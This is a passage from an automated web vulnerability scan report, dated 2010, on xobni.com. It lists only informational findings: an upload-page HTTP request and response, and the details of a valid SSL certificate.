Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:19 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 147
Connection: close
Content-Type: text/html

<HTML>
<HEAD><TITLE>FAQ</TITLE></HEAD>
<BODY style="font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; font-size: 8pt;">
</BODY>
</HTML>

17.5. http://www.xobni.com/support/upload/ previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/support/upload/

Request

GET /support/upload/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2996
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Fla
...[SNIP]...

18. SSL certificate previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.xobni.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.xobni.com
Issued by:	Equifax Secure Global eBusiness CA-1
Valid from:	Wed Sep 10 14:57:43 CDT 2008
Valid to:	Tue Sep 10 14:57:43 CDT 2013

Certificate chain #1

Issued to:	Equifax Secure Global eBusiness CA-1
Issued by:	Equifax Secure Global eBusiness CA-1
Valid from:	Sun Jun 20 23:00:00 CDT 1999
Valid to:	Sat Jun 20 23:00:00 CDT 2020

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by CloudScan Vulnerability Crawler at Mon Dec 13 19:27:49 CST 2010.